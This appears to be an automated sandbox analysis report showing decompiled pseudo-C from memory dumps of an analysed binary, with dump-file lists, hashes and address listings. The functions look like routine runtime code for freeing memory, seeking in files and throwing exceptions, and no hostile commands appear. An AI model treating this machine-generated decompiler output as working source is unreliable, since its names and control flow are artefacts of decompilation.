                    0x013c57b3
                    0x013c57b3

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f578a0361dc63d9f77ee75e5008187c82f86b40946aafe2acf2e4258042f1ece
                    • Instruction ID: 28e4bb034e81bc297e8e2d6640a15124c33cc901822f1db89ad8b218aaa30fb8
                    • Opcode Fuzzy Hash: f578a0361dc63d9f77ee75e5008187c82f86b40946aafe2acf2e4258042f1ece
                    • Instruction Fuzzy Hash: 9201497120420A95EF0D9B7C8C08E6F3B4A5F8072CB14032DE62DC51C1DB31ED918288
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0140392A(void* __ebx, void* __ecx) {
                    				void* _t2;
                    				intOrPtr _t3;
                    				signed int _t15;
                    				signed int _t16;
                    
                    				if( *0x143a610 == 0) {
                    					_push(_t15);
                    					E0140D0F6(__ecx); // executed
                    					_t2 = E0140D3DE(); // executed
                    					_t19 = _t2;
                    					if(_t2 != 0) {
                    						_t3 = E01403983(__ebx, _t19);
                    						if(_t3 != 0) {
                    							 *0x143a61c = _t3;
                    							E0140C706(0x143a610, _t3);
                    							_t16 = 0;
                    						} else {
                    							_t16 = _t15 | 0xffffffff;
                    						}
                    						E014012E1(0);
                    					} else {
                    						_t16 = _t15 | 0xffffffff;
                    					}
                    					E014012E1(_t19);
                    					return _t16;
                    				} else {
                    					return 0;
                    				}
                    			}







                    0x01403931
                    0x01403937
                    0x01403938
                    0x0140393d
                    0x01403942
                    0x01403946
                    0x0140394e
                    0x01403956
                    0x01403963
                    0x01403968
                    0x0140396d
                    0x01403958
                    0x01403958
                    0x01403958
                    0x01403971
                    0x01403948
                    0x01403948
                    0x01403948
                    0x01403978
                    0x01403982
                    0x01403933
                    0x01403935
                    0x01403935

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 7b73f3ab86e1804e42f655f3c528453978978ffd12e28ee686d399dd227587eb
                    • Instruction ID: 8090470abe52f379ab91af910c7d87c22cdb7381e219461039923247682c52f8
                    • Opcode Fuzzy Hash: 7b73f3ab86e1804e42f655f3c528453978978ffd12e28ee686d399dd227587eb
                    • Instruction Fuzzy Hash: D1E0A06250551259D6332ABF3848A6B1E456BE1631B21033FE468E71F4CF7084439295
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E013D8710(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				char _v16;
                    				signed int _v20;
                    				char _v60;
                    				char _v61;
                    				intOrPtr _v68;
                    				intOrPtr _v72;
                    				intOrPtr _v76;
                    				intOrPtr _v80;
                    				intOrPtr _v84;
                    				signed int _v88;
                    				intOrPtr _v92;
                    				char _v96;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t57;
                    				signed int _t58;
                    				intOrPtr _t60;
                    				intOrPtr _t62;
                    				void* _t69;
                    				void* _t74;
                    				intOrPtr _t80;
                    				void* _t83;
                    				intOrPtr* _t94;
                    				intOrPtr* _t96;
                    				intOrPtr _t98;
                    				intOrPtr _t100;
                    				signed int _t101;
                    				signed int _t103;
                    				signed int _t105;
                    				signed int _t117;
                    				void* _t122;
                    				intOrPtr _t125;
                    				intOrPtr _t126;
                    				signed int _t128;
                    				signed int _t130;
                    				void* _t131;
                    				void* _t132;
                    				void* _t133;
                    				void* _t134;
                    				void* _t135;
                    
                    				_push(0xffffffff);
                    				_push(E01417398);
                    				_push( *[fs:0x0]);
                    				_t132 = _t131 - 0x50;
                    				_t57 =  *0x1435234; // 0x78d9f939
                    				_t58 = _t57 ^ _t130;
                    				_v20 = _t58;
                    				_push(_t58);
                    				 *[fs:0x0] =  &_v16;
                    				_t125 = _a12;
                    				_t119 = _a8;
                    				_t100 = _a16;
                    				_t98 = _a4;
                    				_t117 =  *(_t125 + 0xc);
                    				_t60 =  *((intOrPtr*)(_t125 + 0x10));
                    				_v72 = _a8;
                    				_v80 = _t125;
                    				_v76 = _t100;
                    				if(_t117 == 0) {
                    					L4:
                    					_t101 =  *(_t100 + 0xc);
                    					_t62 =  *((intOrPtr*)(_v76 + 0x10));
                    					if(_t101 == 0) {
                    						L8:
                    						_t101 =  &_v60;
                    						E013D1F70(_t98, _t101, _t117, _t144);
                    						E013F4EC6( &_v60, 0x143228c);
                    						L9:
                    						if(_t101 == 0) {
                    							goto L8;
                    						}
                    						if(_t117 >= _t101) {
                    							_t122 = (_t101 & 0x00000001) + _t101;
                    							_v68 = (_t117 & 0x00000001) + _t117;
                    							_t69 = E013D93B0(_t122);
                    							_t133 = _t132 + 4;
                    							E013D8390(_t98 + 4, _t122, _t69);
                    							_t103 =  *(_t98 + 0x10);
                    							__eflags = _t103;
                    							if(_t103 != 0) {
                    								__eflags =  *(_t98 + 0xc) << 2;
                    								E013F5890(_t122, _t103, 0,  *(_t98 + 0xc) << 2);
                    								_t133 = _t133 + 0xc;
                    							}
                    							 *((intOrPtr*)(_t98 + 8)) = 0x3fffffff;
                    							 *((intOrPtr*)(_t98 + 0x14)) = 0;
                    							_t74 = E013D93B0(_v68 - _t122 + 2);
                    							_t126 = _v72;
                    							_t134 = _t133 + 4;
                    							E013D8390(_t126 + 4, _t122, _t74);
                    							_t105 =  *(_t126 + 0x10);
                    							__eflags = _t105;
                    							if(_t105 != 0) {
                    								__eflags =  *(_t126 + 0xc) << 2;
                    								E013F5890(_t122, _t105, 0,  *(_t126 + 0xc) << 2);
                    								_t134 = _t134 + 0xc;
                    							}
                    							_t106 = _v68;
                    							 *((intOrPtr*)(_t126 + 8)) = 0x3fffffff;
                    							_v92 = 0x3fffffff;
                    							 *((intOrPtr*)(_t126 + 0x14)) = 0;
                    							_t128 = _v68 + (_t122 + 2) * 2 + _t122 + 2;
                    							_v88 = _t128;
                    							E013D5D20(_t117, _t128);
                    							_t135 = _t134 + 4;
                    							__eflags = _t128;
                    							if(_t128 != 0) {
                    								_t80 = E013CD970(_t106, _t122, _t128, _t128 * 4);
                    								_t135 = _t135 + 4;
                    							} else {
                    								_t80 = 0;
                    							}
                    							_v84 = _t80;
                    							_v8 = 0;
                    							E013D6580( *(_t98 + 0x10),  *((intOrPtr*)(_v72 + 0x10)), _t80,  *((intOrPtr*)(_v80 + 0x10)), _v68,  *((intOrPtr*)(_v76 + 0x10)), _t122);
                    							_t83 = E013C39AF( &_v96); // executed
                    							L12:
                    							 *[fs:0x0] = _v16;
                    							return E013F268B(_t83, _v20 ^ _t130);
                    						}
                    						E013D2BA0(_t98, _t125);
                    						 *((intOrPtr*)(_t98 + 0x14)) = 0;
                    						_t83 = E013D2BA0(_t119, E013D9320( &_v61, _t119));
                    						goto L12;
                    					}
                    					_t94 = _t62 + _t101 * 4 + 0xfffffffc;
                    					while( *_t94 == 0) {
                    						_t94 = _t94 - 4;
                    						_t101 = _t101 - 1;
                    						_t144 = _t101;
                    						if(_t101 != 0) {
                    							continue;
                    						}
                    						goto L8;
                    					}
                    					goto L9;
                    				}
                    				_t96 = _t60 + _t117 * 4 + 0xfffffffc;
                    				while( *_t96 == 0) {
                    					_t96 = _t96 - 4;
                    					_t117 = _t117 - 1;
                    					if(_t117 != 0) {
                    						continue;
                    					}
                    					goto L4;
                    				}
                    				goto L4;
                    			}














































                    0x013d8713
                    0x013d8715
                    0x013d8720
                    0x013d8721
                    0x013d8724
                    0x013d8729
                    0x013d872b
                    0x013d8731
                    0x013d8735
                    0x013d873b
                    0x013d873e
                    0x013d8741
                    0x013d8744
                    0x013d8747
                    0x013d874a
                    0x013d874d
                    0x013d8750
                    0x013d8753
                    0x013d8758
                    0x013d876d
                    0x013d8770
                    0x013d8773
                    0x013d8778
                    0x013d878d
                    0x013d878d
                    0x013d8790
                    0x013d879e
                    0x013d87a3
                    0x013d87a5
                    0x00000000
                    0x00000000
                    0x013d87a9
                    0x013d87f0
                    0x013d87f5
                    0x013d87f8
                    0x013d87fd
                    0x013d8804
                    0x013d8809
                    0x013d880c
                    0x013d880e
                    0x013d8813
                    0x013d881a
                    0x013d881f
                    0x013d881f
                    0x013d8827
                    0x013d8831
                    0x013d8839
                    0x013d883e
                    0x013d8841
                    0x013d8848
                    0x013d884d
                    0x013d8850
                    0x013d8852
                    0x013d8857
                    0x013d885e
                    0x013d8863
                    0x013d8863
                    0x013d8866
                    0x013d886b
                    0x013d8872
                    0x013d8879
                    0x013d8886
                    0x013d8889
                    0x013d888c
                    0x013d8891
                    0x013d8894
                    0x013d8896
                    0x013d88a4
                    0x013d88a9
                    0x013d8898
                    0x013d8898
                    0x013d8898
                    0x013d88ac
                    0x013d88b3
                    0x013d88d0
                    0x013d88db
                    0x013d87ca
                    0x013d87cd
                    0x013d87e5
                    0x013d87e5
                    0x013d87ae
                    0x013d87b6
                    0x013d87c5
                    0x00000000
                    0x013d87c5
                    0x013d877d
                    0x013d8780
                    0x013d8785
                    0x013d8788
                    0x013d8788
                    0x013d878b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013d878b
                    0x00000000
                    0x013d8780
                    0x013d875d
                    0x013d8760
                    0x013d8765
                    0x013d8768
                    0x013d876b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013d876b
                    0x00000000

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013D879E
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID:
                    • API String ID: 2005118841-0
                    • Opcode ID: 1f9c494dafd647d026d04fc1bb037c215773b3b86c4403f54be36a2f7e48afc2
                    • Instruction ID: d4e899eb29b092e5c2538b3f5f3334746f0c2e40f7e8b54456a35e373c016fa0
                    • Opcode Fuzzy Hash: 1f9c494dafd647d026d04fc1bb037c215773b3b86c4403f54be36a2f7e48afc2
                    • Instruction Fuzzy Hash: 8751E4B2A002059FDB14DF68EC41BAEBBB9FF54318F15466DE8159B280DB31F911CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E014085C9(signed int __edx, intOrPtr* _a4) {
                    				char _v5;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _t64;
                    				signed int _t66;
                    				signed char _t68;
                    				signed int _t70;
                    				signed char _t77;
                    				intOrPtr* _t78;
                    				signed int _t79;
                    				signed char _t80;
                    				intOrPtr _t82;
                    				intOrPtr _t83;
                    				signed int _t90;
                    				intOrPtr _t93;
                    				signed int _t94;
                    				intOrPtr* _t95;
                    				signed char _t96;
                    				signed int _t99;
                    				signed int _t100;
                    				signed int _t103;
                    				signed int _t109;
                    				signed int _t111;
                    				signed int _t113;
                    				signed int _t114;
                    				signed int _t115;
                    				signed int _t118;
                    				signed int _t120;
                    
                    				_t104 = __edx;
                    				if(_a4 != 0) {
                    					_t64 = E01407888(_a4);
                    					_t93 = _a4;
                    					_t118 = _t64;
                    					__eflags =  *(_t93 + 8);
                    					if( *(_t93 + 8) < 0) {
                    						 *(_t93 + 8) = 0;
                    					}
                    					_t66 = E01408DFE(_t118, 0, 0, 1); // executed
                    					_t90 = _t104;
                    					_t109 = _t66;
                    					_v12 = _t109;
                    					__eflags = _t90;
                    					if(__eflags > 0) {
                    						L7:
                    						_t68 =  *(_a4 + 0xc);
                    						__eflags = _t68 & 0x000000c0;
                    						if((_t68 & 0x000000c0) != 0) {
                    							_t70 = _t118 >> 6;
                    							_t94 = (_t118 & 0x0000003f) * 0x30;
                    							_v16 = _t70;
                    							_v20 = _t94;
                    							_t95 = _a4;
                    							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0x143a740 + _t70 * 4)) + 0x29));
                    							_t96 =  *(_t95 + 0xc);
                    							asm("cdq");
                    							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
                    							__eflags = _t96 & 0x00000003;
                    							if((_t96 & 0x00000003) == 0) {
                    								_t77 =  *(_a4 + 0xc) >> 2;
                    								__eflags = _t77 & 0x00000001;
                    								if((_t77 & 0x00000001) != 0) {
                    									L23:
                    									_t78 = _a4;
                    									L24:
                    									__eflags = _t109 | _t90;
                    									if((_t109 | _t90) == 0) {
                    										L30:
                    										_t79 = _t120;
                    										goto L31;
                    									}
                    									_t80 =  *(_t78 + 0xc);
                    									__eflags = _t80 & 0x00000001;
                    									if((_t80 & 0x00000001) == 0) {
                    										__eflags = _v5 - 1;
                    										if(_v5 == 1) {
                    											_t120 = E013F2770(_t120, _t104, 2, 0);
                    										}
                    										_t120 = _t120 + _t109;
                    										asm("adc edx, ebx");
                    										goto L30;
                    									}
                    									_t79 = E0140875E(_a4, _t109, _t90, _t120, _t104);
                    									goto L31;
                    								}
                    								_t66 = E013FDB3A();
                    								 *_t66 = 0x16;
                    								goto L22;
                    							}
                    							__eflags = _v5 - 1;
                    							_t99 = _v16;
                    							if(_v5 != 1) {
                    								L13:
                    								_t82 =  *((intOrPtr*)(0x143a740 + _t99 * 4));
                    								_t100 = _v20;
                    								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
                    								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
                    									goto L23;
                    								}
                    								_t78 = _a4;
                    								_v20 = _v20 & 0x00000000;
                    								_t111 =  *(_t78 + 4);
                    								__eflags =  *_t78 - _t111;
                    								asm("sbb edi, edi");
                    								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
                    								__eflags = _t113;
                    								_v16 = _t113;
                    								_t109 = _v12;
                    								if(_t113 == 0) {
                    									goto L24;
                    								}
                    								_t103 =  *(_t78 + 4);
                    								_t114 = _v20;
                    								do {
                    									__eflags =  *_t103 - 0xa;
                    									if( *_t103 == 0xa) {
                    										_t120 = _t120 + 1;
                    										asm("adc edx, 0x0");
                    									}
                    									_t103 = _t103 + 1;
                    									_t114 = _t114 + 1;
                    									__eflags = _t114 - _v16;
                    								} while (_t114 != _v16);
                    								_t109 = _v12;
                    								goto L24;
                    							}
                    							_t115 = _v20;
                    							_t83 =  *((intOrPtr*)(0x143a740 + _t99 * 4));
                    							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
                    							_t109 = _v12;
                    							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
                    								goto L13;
                    							}
                    							_t79 = E014088E2(_a4, _t109, _t90);
                    							goto L31;
                    						}
                    						asm("cdq");
                    						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
                    						asm("sbb ebx, edx");
                    						goto L31;
                    					} else {
                    						if(__eflags < 0) {
                    							L22:
                    							_t79 = _t66 | 0xffffffff;
                    							L31:
                    							return _t79;
                    						}
                    						__eflags = _t109;
                    						if(_t109 < 0) {
                    							goto L22;
                    						}
                    						goto L7;
                    					}
                    				}
                    				 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    				return E013FDA61() | 0xffffffff;
                    			}
































                    0x014085c9
                    0x014085d5
                    0x014085f5
                    0x014085fb
                    0x014085fe
                    0x01408602
                    0x01408605
                    0x01408607
                    0x01408607
                    0x01408611
                    0x01408616
                    0x0140861b
                    0x0140861d
                    0x01408620
                    0x01408622
                    0x01408632
                    0x01408635
                    0x01408638
                    0x0140863a
                    0x01408655
                    0x01408658
                    0x0140865b
                    0x01408665
                    0x0140866c
                    0x0140866f
                    0x01408677
                    0x0140867a
                    0x0140867b
                    0x0140867d
                    0x01408680
                    0x01408704
                    0x01408707
                    0x01408709
                    0x0140871d
                    0x0140871d
                    0x01408720
                    0x01408722
                    0x01408724
                    0x01408755
                    0x01408755
                    0x00000000
                    0x01408755
                    0x01408726
                    0x01408729
                    0x0140872b
                    0x0140873e
                    0x01408742
                    0x0140874f
                    0x0140874f
                    0x01408751
                    0x01408753
                    0x00000000
                    0x01408753
                    0x01408734
                    0x00000000
                    0x01408739
                    0x0140870b
                    0x01408710
                    0x00000000
                    0x01408710
                    0x01408682
                    0x01408686
                    0x01408689
                    0x014086b1
                    0x014086b1
                    0x014086b8
                    0x014086bb
                    0x014086c0
                    0x00000000
                    0x00000000
                    0x014086c2
                    0x014086c5
                    0x014086ce
                    0x014086d1
                    0x014086d3
                    0x014086d7
                    0x014086d7
                    0x014086d9
                    0x014086dc
                    0x014086df
                    0x00000000
                    0x00000000
                    0x014086e1
                    0x014086e4
                    0x014086e7
                    0x014086e7
                    0x014086ea
                    0x014086ec
                    0x014086ef
                    0x014086ef
                    0x014086f2
                    0x014086f3
                    0x014086f4
                    0x014086f4
                    0x014086f9
                    0x00000000
                    0x014086f9
                    0x0140868b
                    0x0140868e
                    0x01408695
                    0x0140869a
                    0x0140869d
                    0x00000000
                    0x00000000
                    0x014086a4
                    0x00000000
                    0x014086a9
                    0x01408642
                    0x01408645
                    0x01408647
                    0x00000000
                    0x01408624
                    0x01408624
                    0x01408716
                    0x01408716
                    0x01408757
                    0x00000000
                    0x01408759
                    0x0140862a
                    0x0140862c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140862c
                    0x01408622
                    0x014085dc
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1554f700e1110e32cd1c2c0bba230fd8565b468dd313de5ed697ab215c265bfa
                    • Instruction ID: b14ded7e0720d2d3dd970d00a6203db5a5929e7a9f7d5f1ba6d84c9d6730d3ca
                    • Opcode Fuzzy Hash: 1554f700e1110e32cd1c2c0bba230fd8565b468dd313de5ed697ab215c265bfa
                    • Instruction Fuzzy Hash: A851E531E00106AFDB12DF2DCD44A6A7FA1EB85364F198579E8089B3E6C771ED42CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E013C7F11(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _v20;
                    				void* __ebp;
                    				signed int _t33;
                    				signed int _t36;
                    				intOrPtr _t37;
                    				intOrPtr _t38;
                    				void* _t44;
                    				void* _t46;
                    				signed int _t49;
                    				intOrPtr* _t60;
                    				intOrPtr* _t61;
                    				signed int _t62;
                    
                    				_t51 = __ecx;
                    				_t33 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t33 ^ _t62;
                    				_t61 = __ecx;
                    				_t60 = _a4;
                    				_t59 =  *((intOrPtr*)(__ecx + 0x1c));
                    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) != __ecx + 0x3c || _a16 != 1 ||  *((intOrPtr*)(__ecx + 0x38)) != 0) {
                    					_t36 = _a12;
                    					_t49 = _a8;
                    				} else {
                    					_t36 = _a12;
                    					_t49 = _a8 + 0xffffffff;
                    					asm("adc eax, 0xffffffff");
                    				}
                    				_v20 = _t36;
                    				if( *((intOrPtr*)(_t61 + 0x4c)) == 0 || E013C5A78(_t51, _t59) == 0) {
                    					L12:
                    					_t37 =  *0x141ef68; // 0xffffffff
                    					 *_t60 = _t37;
                    					_t38 =  *0x141ef6c; // 0xffffffff
                    					 *(_t60 + 8) =  *(_t60 + 8) & 0x00000000;
                    					 *(_t60 + 0xc) =  *(_t60 + 0xc) & 0x00000000;
                    					 *((intOrPtr*)(_t60 + 4)) = _t38;
                    					 *(_t60 + 0x10) =  *(_t60 + 0x10) & 0x00000000;
                    					 *(_t60 + 0x14) =  *(_t60 + 0x14) & 0x00000000;
                    				} else {
                    					_t54 = _v20;
                    					if((_t49 | _v20) != 0 || _a16 != 1) {
                    						_t44 = E013FE57C( *((intOrPtr*)(_t61 + 0x4c)), _t49, _t54, _a16); // executed
                    						if(_t44 != 0) {
                    							goto L12;
                    						} else {
                    							goto L10;
                    						}
                    					} else {
                    						L10:
                    						_t46 = E013FE0FF(_t59,  *((intOrPtr*)(_t61 + 0x4c)),  &_v16); // executed
                    						if(_t46 != 0) {
                    							goto L12;
                    						} else {
                    							E013C60BF(_t61);
                    							E013C2B37(_t60,  *((intOrPtr*)(_t61 + 0x40)),  *((intOrPtr*)(_t61 + 0x44)), _v16, _v12);
                    						}
                    					}
                    				}
                    				return E013F268B(_t60, _v8 ^ _t62);
                    			}


















                    0x013c7f11
                    0x013c7f17
                    0x013c7f1e
                    0x013c7f23
                    0x013c7f26
                    0x013c7f29
                    0x013c7f31
                    0x013c7f4d
                    0x013c7f50
                    0x013c7f3f
                    0x013c7f42
                    0x013c7f45
                    0x013c7f48
                    0x013c7f48
                    0x013c7f57
                    0x013c7f5a
                    0x013c7fb6
                    0x013c7fb6
                    0x013c7fbb
                    0x013c7fbd
                    0x013c7fc2
                    0x013c7fc6
                    0x013c7fca
                    0x013c7fcd
                    0x013c7fd1
                    0x013c7f65
                    0x013c7f65
                    0x013c7f6c
                    0x013c7f7c
                    0x013c7f86
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c7f88
                    0x013c7f88
                    0x013c7f8f
                    0x013c7f98
                    0x00000000
                    0x013c7f9a
                    0x013c7f9c
                    0x013c7faf
                    0x013c7faf
                    0x013c7f98
                    0x013c7f6c
                    0x013c7fe7

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: fpos
                    • String ID:
                    • API String ID: 1083263101-0
                    • Opcode ID: 1e2b62a2db8b96c3b3287c4ad9553bf839d591166b85a7855d71f34f2d312631
                    • Instruction ID: 76d8d8c1b067d013fbafd241573cd6143901339092f9179477621c2239987fb0
                    • Opcode Fuzzy Hash: 1e2b62a2db8b96c3b3287c4ad9553bf839d591166b85a7855d71f34f2d312631
                    • Instruction Fuzzy Hash: 54317A3160060BEFDB21DF18C984A6AB3B5FF04729F00466DED1186691EB71ED28CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E013C7E38(intOrPtr* __ecx) {
                    				void* _t54;
                    				intOrPtr* _t62;
                    				intOrPtr* _t65;
                    				intOrPtr _t67;
                    				intOrPtr* _t68;
                    				intOrPtr _t70;
                    				intOrPtr* _t82;
                    				void* _t83;
                    				void* _t87;
                    				void* _t88;
                    
                    				_t62 = __ecx;
                    				_push(0x20);
                    				E013F26C2(E01415FA8);
                    				_t82 = _t62;
                    				_t75 =  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe | 0x00000004 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe;
                    				E013C6548( *((intOrPtr*)( *_t82 + 4)) + _t82,  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe | 0x00000004 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe,  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe | 0x00000004 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe, 0);
                    				 *((intOrPtr*)(_t83 - 0x14)) = _t82;
                    				_t65 =  *((intOrPtr*)( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0x38));
                    				if(_t65 != 0) {
                    					 *((intOrPtr*)( *_t65 + 4))();
                    				}
                    				 *((intOrPtr*)(_t83 - 4)) = 0;
                    				 *((char*)(_t83 - 0x10)) = E013C5E97(_t82, _t75, 1);
                    				 *((intOrPtr*)(_t83 - 4)) = 1;
                    				_t67 =  *((intOrPtr*)( *_t82 + 4));
                    				if(( *(_t67 + _t82 + 0xc) & 0x00000006) == 0) {
                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + _t82 + 0x38)))) + 0x28))(_t83 - 0x2c,  *((intOrPtr*)(_t83 + 8)),  *((intOrPtr*)(_t83 + 0xc)),  *((intOrPtr*)(_t83 + 0x10)), 1);
                    					_t54 =  *((intOrPtr*)(_t83 - 0x2c)) +  *((intOrPtr*)(_t83 - 0x24));
                    					_t70 =  *((intOrPtr*)(_t83 - 0x28));
                    					asm("adc ecx, [ebp-0x20]");
                    					_t87 = _t54 -  *0x141ef68; // 0xffffffff
                    					if(_t87 == 0) {
                    						_t88 = _t70 -  *0x141ef6c; // 0xffffffff
                    						if(_t88 == 0) {
                    							_t79 =  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 6 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 0x00000002;
                    							E013C6548( *((intOrPtr*)( *_t82 + 4)) + _t82,  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 6 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 0x00000002,  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 6 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 0x00000002, 0);
                    						}
                    					}
                    				}
                    				 *((intOrPtr*)(_t83 - 4)) = 2;
                    				_t68 =  *((intOrPtr*)( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0x38));
                    				if(_t68 != 0) {
                    					 *((intOrPtr*)( *_t68 + 8))();
                    				}
                    				return E013F269C(_t82);
                    			}













                    0x013c7e38
                    0x013c7e38
                    0x013c7e3f
                    0x013c7e44
                    0x013c7e5e
                    0x013c7e62
                    0x013c7e69
                    0x013c7e6f
                    0x013c7e75
                    0x013c7e79
                    0x013c7e79
                    0x013c7e7e
                    0x013c7e8a
                    0x013c7e8f
                    0x013c7e92
                    0x013c7e9a
                    0x013c7eb0
                    0x013c7eb6
                    0x013c7eb9
                    0x013c7ebc
                    0x013c7ebf
                    0x013c7ec5
                    0x013c7ec7
                    0x013c7ecd
                    0x013c7ee5
                    0x013c7ee9
                    0x013c7ee9
                    0x013c7ecd
                    0x013c7ec5
                    0x013c7ef0
                    0x013c7efa
                    0x013c7f00
                    0x013c7f04
                    0x013c7f04
                    0x013c7f0e

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C7E3F
                      • Part of subcall function 013C6548: __CxxThrowException@8.LIBVCRUNTIME ref: 013C65B7
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
